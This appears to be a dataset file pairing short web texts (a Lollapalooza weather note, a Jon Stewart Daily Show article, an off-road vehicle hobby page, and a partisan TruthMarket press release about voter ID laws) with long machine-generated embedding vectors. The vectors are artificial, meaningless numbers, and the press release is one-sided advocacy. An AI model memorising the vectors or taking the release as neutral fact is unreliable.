briefly evacuated Sunday afternoon due to approaching storms. Lollapalooza artists returned to the stage around 4 p.m.
[ -0.006838452070951462, 0.07426679134368896, 0.09511950612068176, 0.0008378962520509958, 0.06172734126448631, -0.05359768867492676, -0.01669849455356598, 0.01301343273371458, -0.028943398967385292, 0.03218863904476166, 0.02118254452943802, 0.027481790632009506, 0.01668483577668667, -0.033053431659936905, -0.022190215066075325, 0.08311403542757034, 0.0019002119079232216, -0.0781664177775383, -0.16468091309070587, 0.003405268769711256, 0.015949266031384468, 0.06252212822437286, -0.042454835027456284, -0.003402378410100937, -0.0005205406923778355, 0.05853745713829994, -0.1377391368150711, 0.06264422088861465, -0.02785557508468628, -0.006634123623371124, 0.02755824662744999, -0.08518510311841965, -0.0716705396771431, 0.07491020113229752, 0.0021210822742432356, -0.042822226881980896, 0.02580268122255802, -0.017846524715423584, -0.007967895828187466, 0.07576996833086014, -0.040828485041856766, 0.0779506042599678, -0.0246121808886528, -0.02482982724905014, -0.0725918784737587, 0.023972630500793457, -0.04447516053915024, -0.01573016121983528, 0.07315623015165329, -0.04988252371549606, -0.013261768966913223, 0.02323826774954796, 0.015660671517252922, 0.03871540725231171, 0.012926855124533176, 0.09935956448316574, 0.0046419440768659115, -0.06599206477403641, -0.0386669859290123, -0.014233697205781937, -0.042006734758615494, 0.013229872100055218, -0.020210646092891693, -0.027601800858974457, 0.003300555981695652, -0.019772497937083244, -0.0865357294678688, -0.012878172099590302, 0.07657640427350998, -0.028511689975857735, 0.014130433090031147, -0.001894198707304895, -0.022172825410962105, -0.06117747351527214, 0.023047184571623802, 0.026206109672784805, 0.041207075119018555, 0.006570334080606699, 0.006463553756475449, -0.0425596684217453, -0.02577093429863453, -0.07399539649486542, 0.11231870949268341, -0.06670898199081421, 0.010037068277597427, 0.07570613920688629, 0.027570944279432297, 0.1003241166472435, 0.06375084817409515, -0.0379820354282856, -0.010597358457744122, -0.10655844956636429, -0.044853128492832184, 0.03993198648095131, 0.017605995759367943, 0.05641932785511017, -0.04816616326570511, -0.054320577532052994, -0.08125439286231995, 0.042850010097026825, -0.06281747668981552, -0.05674700811505318, 0.07477869093418121, -0.016880333423614502, -0.058848317712545395, -0.00869817566126585, -0.010099804028868675, 0.08849888294935226, -0.010663755238056183, -0.07984530180692673, 0.018966544419527054, -0.008897253312170506, 0.06616797298192978, 0.10082317888736725, 0.005808309186249971, -0.072118379175663, 0.029305240139365196, 0.01128709502518177, -0.09496854245662689, -0.01700756698846817, 0.06988684087991714, 0.053853534162044525, -0.040609635412693024, 0.054771531373262405, 0.014435743913054466, 0.05324728786945343, 0.06580842286348343, 2.0799097861113705e-33, 0.14485938847064972, 0.053984519094228745, 0.017099997028708458, -0.022634489461779594, 0.12142936885356903, -0.014598755165934563, -0.03655848652124405, -0.047479141503572464, -0.007790286559611559, 0.087117999792099, -0.034152593463659286, -0.04213695228099823, -0.0013006838271394372, -0.0630665048956871, 0.012537099421024323, -0.06048392876982689, -0.030228981748223305, -0.023122020065784454, -0.06215163320302963, 0.1042880192399025, -0.015371745452284813, -0.06372179090976715, -0.03577377647161484, -0.13479970395565033, -0.0687350407242775, -0.03984253108501434, -0.045733336359262466, 0.059984609484672546, 0.049366433173418045, 0.01594742387533188, -0.0005441035027615726, -0.10477229952812195, 0.036969754844903946, 0.011433349922299385, 0.001843291218392551, 0.004859765991568565, -0.0191479679197073, -0.007905667647719383, 0.018130522221326828, -0.049788326025009155, -0.010974436067044735, 0.029230399057269096, -0.07821487635374069, 0.0865245908498764, 0.0011314412113279104, -0.0046280259266495705, 0.013947756960988045, 0.07600899040699005, -0.04499755799770355, -0.043750517070293427, 0.036642689257860184, 0.06142817437648773, 0.06118045374751091, -0.012761609628796577, 0.01655159890651703, 0.1140068769454956, 0.11190422624349594, -0.05189526826143265, 0.12422256171703339, 0.06625338643789291, 0.028206482529640198, 0.0054430244490504265, -0.0006588182295672596, -0.11323947459459305, 0.03397724777460098, -0.034705884754657745, 0.02981107123196125, 0.0504785031080246, -0.05269543454051018, -0.0278931874781847, -0.007680961862206459, -0.029883863404393196, 0.010997098870575428, 0.06350796669721603, 0.07626630365848541, -0.07958990335464478, 0.02426285296678543, -0.017195921391248703, 0.018506783992052078, -0.00475073978304863, -0.0006420236313715577, -0.0326417051255703, -0.011326804757118225, -0.026410015299916267, -0.008056441321969032, -0.05971881002187729, -0.023337898775935173, -0.08246494829654694, -0.06197507679462433, 0.0023925837595015764, -0.008985105901956558, 0.05509867146611214, 0.064029261469841, -0.07317884266376495, 0.010734105482697487, -2.556283830898895e-33, -0.0459987036883831, -0.020786482840776443, -0.08081414550542831, 0.04313013702630997, 0.0822179913520813, 0.04319686070084572, -0.0172239001840353, 0.007119211368262768, 0.03136850893497467, -0.0312546044588089, 0.05355294048786163, -0.029591578990221024, -0.04610227420926094, 0.02431700937449932, 0.07625062018632889, -0.046466708183288574, 0.043856553733348846, 0.042224567383527756, -0.017389792948961258, -0.03336014598608017, 0.03204568848013878, -0.06639496237039566, -0.1179632917046547, 0.04311200976371765, 0.023175127804279327, 0.04594848304986954, -0.013044844381511211, 0.04030228778719902, 0.0004992064204998314, -0.057437602430582047, -0.06186069920659065, -0.03285599127411842, 0.04813174158334732, 0.014131816104054451, -0.004078704863786697, 0.04619419574737549, 0.010425019077956676, -0.044573280960321426, 0.023006349802017212, -0.002841566689312458, 0.008189886808395386, 0.014934387989342213, 0.0009423140436410904, 0.029239926487207413, -0.05212302878499031, 0.06978705525398254, 0.02787061221897602, 0.05944475904107094, -0.015893492847681046, -0.038547758013010025, 0.016012301668524742, 0.05563967674970627, -0.039080649614334106, 0.05433438718318939, 0.04276985302567482, 0.014974397607147694, 0.07594656199216843, -0.059914205223321915, -0.0751989558339119, -0.017423370853066444, -0.08684953302145004, 0.03836071118712425, -0.024176662787795067, 0.11616982519626617, 0.06295408308506012, -0.032830897718667984, -0.03954567387700081, -0.0462149903178215, -0.08493362367153168, -0.012586238794028759, -0.056327857077121735, 0.023672593757510185, 0.02987060695886612, -0.014800427481532097, 0.043037835508584976, 0.0022255934309214354, -0.03554045781493187, -0.01843755692243576, -0.045886844396591187, 0.032977622002363205, -0.04259740933775902, 0.021419616416096687, -0.04785925894975662, -0.06254833936691284, 0.08329934626817703, -0.03355256840586662, 0.04798870161175728, -0.06462301313877106, -0.040478337556123734, 0.0011445858981460333, -0.019910231232643127, 0.037007346749305725, -0.018914183601737022, 0.08716155588626862, 0.04191090539097786, -5.310400297275919e-8, -0.05338431894779205, 0.11244089901447296, -0.05399801954627037, -0.035216763615608215, 0.059048108756542206, 0.015764927491545677, 0.1498851776123047, 0.05232028663158417, -0.00840875692665577, -0.007089308928698301, 0.03339815512299538, 0.02282143570482731, -0.029953304678201675, 0.0336541049182415, -0.03852665424346924, -0.04636630043387413, -0.05214020237326622, -0.06920278072357178, 0.001243539503775537, 0.019486570730805397, 0.0223469790071249, 0.02538459561765194, -0.055395692586898804, -0.01920291781425476, 0.016420751810073853, 0.013336080126464367, 0.032749928534030914, 0.0529487282037735, -0.026576276868581772, -0.01545308344066143, -0.047891225665807724, 0.027291040867567062, -0.018335212022066116, -0.010693433694541454, -0.08597279340028763, -0.039216864854097366, -0.04776420444250107, 0.07998110353946686, 0.010585658252239227, -0.00009065282210940495, 0.004336834419518709, 0.04720790684223175, 0.062126919627189636, -0.02398386225104332, 0.04025968164205551, 0.044955383986234665, 0.05968354269862175, -0.01743406057357788, 0.03844698145985603, -0.021038593724370003, 0.01818196102976799, -0.023271024227142334, 0.03503149747848511, 0.021961728110909462, 0.044627271592617035, -0.00030037047690711915, -0.030059412121772766, -0.11587236076593399, -0.007314730901271105, -0.02656915970146656, -0.052341803908348083, -0.05309931933879852, -0.04154706373810768, 0.10469077527523041 ]
Stewart is realizing that he hasn't wounded Fox News quite as much as he might have liked. Jon Stewart has orchestrated countless epic takedowns as host of The Daily Show, but was it all for naught? During his penultimate episode, Stewart showed headlines from articles that had been written about his previous episodes that used words like "eviscerated" to describe the way he would present his views on a controversial topic. "I feel like what we've built here is a monument to evisceration," reflected Stewart, whose final episode airs Thursday, Aug. 6. "By the way, it wasn't just eviscerating. We 'demolished,' 'crushed' — we 'annihilated' things. I remember one night, even the Hulk was like, 'Dude, slow down.' " In a segment entitled "The Daily Show: Destroyer of Worlds," Stewart played clips of himself mocking some of his favorite targets, including ISIS, racial tension in the U.S. and, of course, Fox News. In each of the instances, Stewart lauded himself for taking down the opponent — before then playing news footage that proclaimed each target still to be as strong as ever. He declared that Fox News' power is now gone, only to then air a clip announcing that the network would moderate this week's Republican presidential-primary debate. "Did I say Fox News' influence was gone?" asked Stewart. "What I meant was, it's gone all the way to the White House." This led him to a grim assessment of his 16-year tenure as host of the show. "The world is demonstrably worse than when I started — have I caused this?" he pondered. Finally, he aired clips of himself berating his beloved New York Mets over the years before a recent news clip declared the Mets in first place, causing Stewart to cheer raucously. Stewart's guest was longtime friend Louis C.K., who praised Stewart for his time on the show but also for being willing to walk away on top. "I'm really amazed by what you did here," said C.K. "It's really like one of the great comedy accomplishments of all time that you did." Email: [email protected] Twitter: @_RyanGajewski
[ 0.051584575325250626, 0.06520046293735504, -0.015300002880394459, 0.03269624710083008, 0.06795394420623779, 0.0003516655706334859, 0.13301490247249603, -0.04556182399392128, 0.014411202631890774, 0.014199569821357727, -0.08941306918859482, 0.07675357162952423, 0.0332217700779438, 0.05889878422021866, -0.05079776048660278, -0.07277161628007889, 0.04446670785546303, -0.04267355799674988, -0.0803510844707489, 0.16711023449897766, 0.016997555270791054, 0.08377795666456223, 0.04659932479262352, -0.019234785810112953, 0.00720607116818428, -0.02420554868876934, -0.08233602344989777, -0.020879939198493958, 0.057432591915130615, 0.0012258581118658185, 0.06309055536985397, -0.06777943670749664, -0.03410954028367996, -0.02000848948955536, -0.05005913972854614, 0.008548139594495296, 0.0644504576921463, 0.007574126124382019, -0.01795937679708004, 0.05247706174850464, 0.00599996093660593, -0.060328107327222824, -0.06208859011530876, -0.0501699224114418, -0.017484476789832115, -0.021595364436507225, -0.01453065313398838, -0.09170251339673996, 0.030945762991905212, -0.04112706705927849, -0.055752336978912354, 0.016399379819631577, 0.012507815845310688, -0.11036267131567001, -0.040231041610240936, -0.0052286190912127495, 0.018201464787125587, -0.005650787148624659, -0.021666236221790314, -0.038326557725667953, 0.017814459279179573, -0.06807579845190048, 0.026098541915416718, 0.0709003433585167, 0.027802197262644768, -0.05967581644654274, 0.11333079636096954, 0.02709183841943741, -0.02846759557723999, 0.09484245628118515, -0.01753624714910984, 0.041880328208208084, -0.005908825900405645, -0.051837168633937836, 0.03447531908750534, 0.03407663851976395, 0.09104859083890915, -0.0655217319726944, 0.012923204340040684, -0.004572851583361626, 0.007942762225866318, -0.045845311135053635, -0.05386747047305107, 0.01958855427801609, -0.04203855246305466, -0.0023309956304728985, 0.000036973797250539064, 0.001352134975604713, 0.014807851985096931, 0.05698329582810402, -0.0776258185505867, 0.053050506860017776, 0.11135070770978928, 0.0560031458735466, 0.09693221747875214, -0.012420015409588814, -0.040735986083745956, -0.03238878399133682, -0.049996621906757355, 0.041203923523426056, -0.012214761227369308, 0.048646073788404465, -0.01571042090654373, -0.016468461602926254, -0.00819945428520441, -0.05022666975855827, -0.08576110005378723, 0.02485469914972782, -0.0074033127166330814, -0.046580564230680466, -0.07138678431510925, 0.03139053285121918, -0.028155740350484848, -0.03187740966677666, 0.02176048792898655, 0.009725392796099186, 0.034165725111961365, -0.04647882282733917, -0.017667880281805992, -0.033776625990867615, 0.018764713779091835, 0.02002677135169506, -0.05744044482707977, 0.07127173244953156, 0.01667431741952896, 0.01344459131360054, -0.016866955906152725, 1.9947957299171826e-33, 0.06883131712675095, 0.017185498028993607, 0.003467600792646408, -0.02036319300532341, 0.05969289690256119, 0.07346850633621216, -0.021944910287857056, -0.017310066148638725, 0.04832516238093376, -0.0177621953189373, -0.03556134179234505, 0.020555024966597557, 0.01696162298321724, -0.008948729373514652, -0.01660546287894249, 0.009020969271659851, -0.023950986564159393, -0.016935495659708977, -0.08683490753173828, -0.05472414940595627, 0.07787296175956726, 0.08135433495044708, 0.002582322806119919, -0.03270827233791351, -0.024572359398007393, -0.029988761991262436, 0.004955588839948177, 0.04284890368580818, -0.11126784235239029, 0.004698629956692457, -0.08808353543281555, 0.053541380912065506, -0.025358522310853004, 0.07673235237598419, 0.02150479517877102, -0.01748190075159073, -0.026200275868177414, -0.004091047216206789, 0.0460553914308548, 0.008555668406188488, 0.02010166645050049, 0.04756198078393936, -0.04508479684591293, -0.015967421233654022, -0.05507268011569977, 0.016926145181059837, 0.04299979284405708, -0.0005241123726591468, -0.0769667997956276, 0.017090434208512306, 0.06766801327466965, 0.03791533410549164, 0.08690256625413895, -0.0328083410859108, -0.04385079815983772, 0.012799724005162716, -0.0026982040144503117, -0.008592451922595501, 0.06640086323022842, -0.0017451653257012367, -0.04806855320930481, -0.01132955215871334, 0.028597477823495865, 0.03643592447042465, -0.0655103474855423, -0.05695116147398949, -0.03071419708430767, 0.047519750893116, -0.15298299491405487, 0.04990063235163689, -0.016269231215119362, 0.019164353609085083, -0.02052900195121765, -0.11693133413791656, 0.026670994237065315, -0.05837467685341835, -0.0658780187368393, 0.006636250764131546, -0.022861545905470848, 0.04423852264881134, -0.000042752857552841306, -0.007632652763277292, 0.053567588329315186, -0.07059800624847412, -0.013421107083559036, 0.011986469849944115, 0.04234979301691055, -0.08676567673683167, 0.06946921348571777, 0.02799481526017189, -0.05289289355278015, -0.08013307303190231, 0.006954551674425602, -0.02267434448003769, -0.07324392348527908, -4.691905620754511e-33, -0.08359193056821823, -0.0013595898635685444, -0.11933674663305283, 0.08727205544710159, -0.023371435701847076, -0.030835358425974846, -0.05188245698809624, 0.08669007569551468, -0.045856595039367676, -0.11854735016822815, 0.02578575164079666, -0.00992309395223856, -0.0781886950135231, 0.015144551172852516, -0.06432529538869858, -0.09719891846179962, 0.06841292232275009, -0.05338944122195244, -0.05244305357336998, 0.025825850665569305, 0.045672107487916946, -0.01655188389122486, -0.08683060109615326, 0.015057265758514404, 0.12267544865608215, -0.053659167140722275, 0.10018914192914963, 0.0055458336137235165, -0.02919740602374077, -0.05664087459445, -0.01604851335287094, -0.009090844541788101, -0.02039371058344841, 0.07730147987604141, 0.06297052651643753, 0.12407878041267395, -0.000988359679467976, -0.02989204414188862, -0.026007700711488724, -0.03868097811937332, 0.02135142870247364, -0.02020232193171978, -0.08490283787250519, 0.08919332921504974, -0.034899722784757614, 0.037410393357276917, -0.06688123196363449, 0.02717437967658043, 0.020161963999271393, 0.032216627150774, -0.05587625131011009, 0.020520420745015144, 0.01713237166404724, 0.09347241371870041, 0.008540540933609009, -0.06010576710104942, 0.022050397470593452, 0.03167787566781044, -0.06804414093494415, 0.015210205689072609, -0.06710437685251236, 0.020971285179257393, 0.0007622030097991228, -0.03751390799880028, 0.03721565753221512, -0.029864884912967682, 0.002993575995787978, 0.01335909590125084, -0.05926160141825676, 0.02480521984398365, -0.055331241339445114, 0.0008414415060542524, -0.038152165710926056, -0.05644157901406288, 0.027363574132323265, 0.034220676869153976, 0.0017038524383679032, -0.04156302660703659, -0.08744314312934875, 0.0010289647616446018, 0.08321203291416168, -0.09150287508964539, 0.039926186203956604, -0.02717970497906208, 0.02301821857690811, 0.09795806556940079, -0.07656097412109375, 0.05008777603507042, -0.09708848595619202, 0.04814856871962547, 0.05789809301495552, -0.05236303433775902, 0.00025214330526068807, 0.08854054659605026, 0.01813693530857563, -6.071117297778983e-8, -0.09530031681060791, 0.044716160744428635, -0.0391768254339695, -0.021538686007261276, 0.0225222148001194, 0.04112903028726578, 0.038167018443346024, -0.044277358800172806, 0.0014202212914824486, 0.004078124184161425, 0.04797634109854698, -0.06003511697053909, 0.06540416926145554, -0.0008322505163960159, -0.034469421952962875, 0.0006684677791781723, -0.02310669794678688, -0.05104370787739754, -0.02390461601316929, 0.009643836878240108, -0.03333708643913269, -0.07123301923274994, -0.012938843108713627, 0.023877929896116257, 0.09674666821956635, -0.013822011649608612, -0.023679601028561592, -0.02757004275918007, 0.06510265171527863, -0.026595182716846466, -0.07710915058851242, -0.021698307245969772, -0.044739656150341034, 0.03261277824640274, 0.022910289466381073, 0.060684844851493835, 0.039645858108997345, 0.051884666085243225, 0.052489712834358215, 0.003690598998218775, 0.008330537006258965, 0.04510622099041939, 0.12074033170938492, 0.013443316332995892, 0.01620672456920147, 0.052159637212753296, -0.11878716200590134, -0.01380342897027731, 0.08349787443876266, -0.07259408384561539, 0.07570131868124008, 0.0032215339597314596, 0.017437076196074486, 0.1030363142490387, 0.010359208099544048, -0.006242335774004459, -0.03582797944545746, 0.00567246088758111, -0.00043850980000570416, 0.00008562325092498213, 0.03572889044880867, -0.0010131702292710543, -0.027933185920119286, 0.023772746324539185 ]
Another Space_Man_Spiff 1990 Chevrolet Tracker post... Moab Easter Jeep Safari. I did Top Of The World trail, and had a great time. The following pics were taken on an outing which happened to turn out as a mud trip because the road to the trail head was blocked. Meet Jessi's '87 V6 4Runner You import tuners can dream about bringing in a skyline all day but this is what I would have. Somebody convince GM they should produce this. I'll trade the on board hot water & all wheel drive features for a factory locker & low range. This is a pic I put together just for kicks. This is my other car, a Fiber Fab Avenger. It is a kit car made in the '70s. Based on a VW chassis with a '92 Subaru 2.2L H4 It has all the wiring in a box waiting. I have had this since I was 16 (also when this pic was taken)but have yet to put it all together. To complete I will need a whole new front suspension, 4wheel discs new paint, fiberglass work and an interior. Page One MOAB! & Big Air Page Two Random Page Three Dreams Page Four Progress Page Five Things to come
[ -0.10114318877458572, -0.03696978837251663, 0.054531339555978775, 0.01090151071548462, 0.03960349038243294, -0.02124531753361225, -0.03505153954029083, 0.012623866088688374, -0.11577638238668442, -0.007814116775989532, 0.04919705167412758, 0.03732500597834587, -0.023815244436264038, 0.005484247114509344, -0.08960659056901932, 0.1063089668750763, 0.00012218333722557873, -0.047811903059482574, -0.024922041222453117, -0.012884600088000298, -0.04843739792704582, -0.07712613046169281, 0.022529277950525284, -0.045610181987285614, -0.13886496424674988, 0.0383509062230587, -0.018678879365324974, 0.07192329317331314, -0.043359242379665375, -0.07948294281959534, 0.01561844814568758, -0.017394600436091423, -0.004242787603288889, -0.06310771405696869, 0.06727442145347595, 0.018940499052405357, 0.05072608217597008, -0.00178300600964576, -0.061428893357515335, -0.04645359516143799, -0.0009032954694703221, -0.03780069947242737, 0.0430726632475853, 0.05925543233752251, 0.007348783314228058, -0.06663989275693893, 0.09028938412666321, -0.05917753651738167, 0.07700802385807037, -0.08986624330282211, -0.031184392049908638, -0.05305442214012146, -0.017267877236008644, -0.04788671061396599, -0.01163905393332243, 0.044843774288892746, -0.062335263937711716, -0.04370966553688049, -0.011430750600993633, -0.07299274951219559, 0.014725848101079464, -0.015776557847857475, 0.025940118357539177, -0.04764347895979881, 0.07661278545856476, -0.014804240316152573, -0.03733810409903526, -0.012578965164721012, -0.002010644180700183, 0.0062245256267488, 0.0013140394585207105, 0.030556675046682358, -0.03918492794036865, 0.025462230667471886, -0.0287519171833992, -0.05296088382601738, 0.05660836771130562, 0.09095118939876556, 0.0828692689538002, 0.01845776103436947, 0.012280979193747044, 0.05162697657942772, 0.03510269895195961, 0.0031871998216956854, -0.05946652218699455, 0.025565961375832558, 0.03736435994505882, -0.01551907416433096, -0.002181668533012271, -0.005724399816244841, -0.0062189227901399136, -0.072413370013237, 0.030328432098031044, -0.002103974809870124, -0.0312526561319828, 0.07791289687156677, -0.026785941794514656, -0.05466115474700928, 0.042308952659368515, 0.059995137155056, 0.007229326292872429, -0.058981362730264664, 0.025912070646882057, -0.06856990605592728, -0.026970207691192627, 0.024358928203582764, -0.03564660996198654, 0.12334154546260834, -0.03961778059601784, -0.020861390978097916, -0.03361896425485611, 0.07196272909641266, -0.02174518071115017, 0.07914154976606369, -0.018071796745061874, -0.03589724749326706, -0.0749480277299881, 0.003824931802228093, 0.016760973259806633, 0.0548311211168766, 0.04709478095173836, 0.03475337103009224, 0.13043813407421112, -0.0013005475047975779, 0.008488580584526062, -0.0236505214124918, 0.028803111985325813, 5.220706529917717e-33, 0.01900303363800049, 0.06741022318601608, -0.007670020684599876, 0.06186937540769577, 0.03321313485503197, 0.034819409251213074, -0.02859221026301384, 0.032759636640548706, -0.08297009021043777, 0.10641858726739883, -0.05437735095620155, -0.07389606535434723, -0.03799044340848923, 0.00025811424711719155, 0.05167320743203163, -0.04927391931414604, -0.07682795077562332, -0.07411345094442368, -0.024971159175038338, -0.0764797031879425, -0.03518395870923996, -0.013529137708246708, -0.010301985777914524, -0.01612488552927971, 0.029025785624980927, 0.0936509296298027, 0.020553113892674446, 0.009998392313718796, -0.018161747604608536, 0.014492832124233246, -0.04389232024550438, 0.0328187495470047, -0.004415130242705345, 0.007842419669032097, -0.012735117226839066, -0.040969762951135635, -0.014098888263106346, -0.08986180275678635, -0.0326978825032711, 0.0293853972107172, 0.004513626918196678, -0.02927003987133503, -0.08144061267375946, -0.012039133347570896, 0.06622061878442764, 0.03706686198711395, 0.04494880139827728, 0.018195366486907005, -0.043341781944036484, 0.10616850107908249, 0.005262535996735096, 0.03974661976099014, 0.03595190867781639, -0.03063683770596981, -0.16337548196315765, -0.00796253141015768, -0.015920139849185944, -0.03892843797802925, 0.10029035061597824, 0.027655653655529022, 0.07448513060808182, 0.037136297672986984, -0.027660630643367767, -0.0021400528494268656, -0.039564892649650574, 0.03139428794384003, -0.01780339889228344, -0.016515931114554405, 0.009549548849463463, 0.06214108318090439, 0.007260703016072512, -0.03063991479575634, -0.021819215267896652, 0.02133321948349476, 0.09714298695325851, -0.01459979172796011, 0.032387830317020416, 0.036506909877061844, -0.03829578682780266, -0.05801860988140106, -0.0007169055752456188, 0.005880603101104498, 0.023409219458699226, -0.01580609753727913, 0.1353004425764084, -0.012754302471876144, 0.019517112523317337, 0.006519685033708811, 0.02538870833814144, 0.10085943341255188, -0.05040867254137993, 0.0025171940214931965, -0.07658223062753677, -0.00999621395021677, 0.040045928210020065, -5.6035837744217523e-33, 0.07633490860462189, 0.013680302537977695, 0.09002692997455597, -0.05467599630355835, 0.04337890073657036, -0.032617587596178055, 0.042860712856054306, 0.012659281492233276, 0.037076544016599655, 0.029849909245967865, 0.01903962902724743, -0.024512864649295807, -0.012488974258303642, -0.01022657286375761, -0.029906967654824257, 0.019193774089217186, -0.05492093786597252, -0.09768633544445038, -0.0024097173009067774, 0.010770460590720177, 0.02476324699819088, 0.11208079010248184, -0.048537980765104294, -0.000947929045651108, -0.01353468094021082, 0.029210610315203667, 0.027996771037578583, 0.11075007170438766, 0.007854647003114223, 0.15026108920574188, -0.016958681866526604, -0.02339242398738861, 0.013811822980642319, 0.013491085730493069, -0.08371403068304062, -0.04933968558907509, 0.06452374905347824, 0.0328640379011631, 0.005421217996627092, -0.029737360775470734, 0.045635391026735306, -0.01692398637533188, -0.04227251559495926, 0.05482775717973709, -0.039780259132385254, -0.032877158373594284, -0.027144186198711395, -0.03371535241603851, -0.03090537153184414, 0.04978460446000099, 0.018667755648493767, -0.04896152392029762, 0.0123679144307971, 0.01538698747754097, -0.008683836087584496, -0.007326331455260515, 0.045954469591379166, -0.048109766095876694, -0.04268919676542282, 0.038321200758218765, 0.025928983464837074, -0.04045232757925987, -0.010425321757793427, -0.07948841899633408, 0.1232813373208046, -0.11609351634979248, 0.06557328253984451, -0.05392984300851822, -0.08751252293586731, -0.0009266717825084925, -0.042323727160692215, -0.029340947046875954, 0.016678189858794212, -0.06324819475412369, 0.10914026200771332, 0.025573963299393654, -0.04623686522245407, 0.024450501427054405, 0.0934026911854744, 0.004661653656512499, -0.08628980815410614, -0.03916739299893379, 0.05637124925851822, 0.05069338157773018, 0.10748372972011566, 0.05208628997206688, -0.05308137461543083, 0.07512452453374863, 0.10951811820268631, -0.027220681309700012, 0.04446418955922127, 0.023355428129434586, 0.03069300763309002, 0.04496396332979202, -0.06445756554603577, -6.838963173549928e-8, 0.025333408266305923, 0.061540957540273666, -0.05881742760539055, 0.005538701079785824, 0.020326724275946617, 0.01821357198059559, -0.04825925827026367, -0.007525261025875807, -0.015591371804475784, -0.06728270649909973, 0.041330840438604355, 0.05389264598488808, -0.05243716016411781, 0.07390038669109344, -0.05714397132396698, -0.02016800083220005, -0.07243983447551727, 0.07503019273281097, -0.06851159781217575, -0.04963475465774536, -0.049214959144592285, 0.022966299206018448, 0.0496504083275795, 0.13955196738243103, -0.0039024711586534977, -0.0172706488519907, 0.028635133057832718, 0.060449544340372086, 0.03461819142103195, -0.04456675425171852, -0.01811813749372959, 0.01978486403822899, 0.010491644963622093, 0.03526197746396065, -0.050919998437166214, -0.06139829754829407, -0.04801267012953758, 0.05620948597788811, 0.03983253985643387, -0.03116231970489025, 0.034900445491075516, -0.008032680489122868, -0.002130254404619336, 0.0000819825945654884, 0.02926657907664776, 0.021708276122808456, -0.0818755105137825, -0.046454090625047684, -0.06428302824497223, -0.0014104981673881412, 0.03201369196176529, -0.03767334297299385, -0.03675590083003044, 0.14969462156295776, 0.06519545614719391, -0.04415464401245117, -0.04581308737397194, 0.032666388899087906, -0.03408675268292427, -0.035794373601675034, -0.0243562962859869, -0.03171369060873985, -0.06591563671827316, -0.06038810685276985 ]
A Marketplace for Truth Telling These laws predictably disenfranchise mostly poor and elderly voters. TruthMarket, a division of Truth Seal Corp., today announced that a private citizen, Geoff Tranchina, is using the platform to dispute claims that new voter ID laws address a significant problem of voter fraud. If Tranchina is able to crowd-fund $10,000 from other citizens opposing these laws, he will be able to launch a campaign to challenge the claims of Republican legislators promulgating these laws. The first person who can deliver verifiable proof that more than 0.1% votes were fraudulent in any statewide or federal election since 2000 would win a $10,000 bounty. Stating that voter fraud is, in fact, insignificant, Tranchina’s campaign will maintain that actions to ram through voter fraud laws requiring government-issued photo IDs are a thinly disguised Republican power grab. Even the Bush administration refuted those claims as fraudulent. Tranchina states that, “Since many poor and elderly citizens cannot easily get to government offices or bear the costs in time and money to secure government IDs, these laws predictably disenfranchise mostly poor and elderly voters. Jim Crow laws were used for decades, in a similar way, to keep freed slaves from voting, and other barriers have been put in front of disadvantaged voters ever since.” By barring these voters, who generally favor Democratic candidates, from polling places, the laws are likely to reduce their numbers and influence election results. To win the $10,000 bounty, a campaign challenger will have to provide verifiable evidence that more than 0.1% votes were fraudulent in any statewide or federal election since 2000. About TruthMarket TruthMarket is a division of Truth Seal, a California Corporation. TruthMarket is designed to be a popular online platform that enables everyone to campaign for truth in public dialogue. The primary objective is to increase truth and trust throughout the public information space – online and offline – by publicly exposing false claims and highlighting true claims. TruthMarket’s ultimate goal is to predispose all public dialogue toward truth telling Trademarks Marketplace for Truth Telling, TruthMarket and TruthSeal are trademarks of Truth Seal Corp.
[ -0.11610064655542374, 0.04437381774187088, -0.013345240615308285, -0.012722938321530819, 0.049305401742458344, 0.01947026327252388, 0.0811760351061821, -0.037872761487960815, 0.005422377027571201, 0.02604730613529682, 0.039647359400987625, 0.05698983371257782, 0.08913056552410126, -0.01658736914396286, -0.00571906752884388, 0.005446427967399359, 0.03515595197677612, 0.10798710584640503, -0.05280934274196625, 0.04741358384490013, -0.02317177876830101, -0.02314096689224243, -0.011258835904300213, -0.0017521224217489362, -0.03333866223692894, -0.08827532827854156, 0.05294496938586235, -0.04673982039093971, -0.04596349596977234, -0.03174418956041336, 0.06111310422420502, 0.018775248900055885, -0.06970822811126709, 0.02384190447628498, 0.022039800882339478, -0.037333182990550995, 0.032268770039081573, 0.0077948784455657005, 0.017098698765039444, -0.0188419371843338, -0.003495732555165887, -0.11580778658390045, -0.06768137216567993, 0.03409356251358986, -0.04344160109758377, 0.053989604115486145, 0.05191810801625252, 0.12787885963916779, -0.004659291356801987, -0.07559505850076675, -0.07789025455713272, 0.02993222326040268, 0.004054958466440439, 0.024241622537374496, -0.05738651379942894, -0.08527342230081558, -0.033783141523599625, 0.03880710154771805, -0.034852806478738785, -0.0012303125113248825, 0.08281335979700089, 0.0024688916746526957, 0.03000650368630886, -0.010540647432208061, -0.02979581616818905, 0.09572413563728333, -0.015860142186284065, -0.0954548567533493, 0.02471466176211834, -0.020885441452264786, 0.09648914635181427, 0.03592725098133087, -0.0021426044404506683, 0.02016027458012104, -0.038505882024765015, -0.08065484464168549, 0.01976369507610798, 0.09100337326526642, 0.08071336895227432, -0.06008753180503845, 0.005865558050572872, 0.0021912597585469484, 0.005724841728806496, -0.015439717099070549, 0.029161611571907997, -0.04797665774822235, -0.12061185389757156, -0.014597269706428051, 0.004054043907672167, 0.014485681429505348, -0.0037257755175232887, 0.04613339528441429, 0.047138821333646774, -0.02118811383843422, 0.07090580463409424, -0.010508128441870213, 0.019539501518011093, 0.0228043794631958, 0.044731199741363525, 0.053849730640649796, -0.1311904340982437, 0.03775393217802048, -0.045640166848897934, -0.10433261096477509, 0.07209668308496475, -0.05392652004957199, -0.03211124241352081, -0.032542865723371506, 0.011785265058279037, 0.06016421690583229, 0.04810277745127678, 0.02809744141995907, 0.01985624060034752, 0.06852410733699799, -0.0006709915469400585, -0.035957906395196915, -0.035937223583459854, 0.06999813765287399, -0.05057398974895477, 0.0001389639510307461, 0.0043128179386258125, 0.07059791684150696, -0.030304545536637306, 0.028696831315755844, 0.032245296984910965, 0.006777044851332903, -0.028540903702378273, 6.101989705750556e-33, 0.00040323863504454494, 0.061135973781347275, -0.03927429020404816, 0.03313293308019638, -0.037598881870508194, 0.035753682255744934, -0.048754457384347916, -0.04723340645432472, -0.04164498299360275, 0.09911543130874634, -0.06871725618839264, 0.09548716247081757, 0.004672716837376356, 0.0790659710764885, 0.06353931874036789, 0.06887848675251007, -0.10384560376405716, 0.03662746399641037, -0.0013262736611068249, -0.08884498476982117, 0.06368961185216904, -0.041446879506111145, 0.05420568212866783, 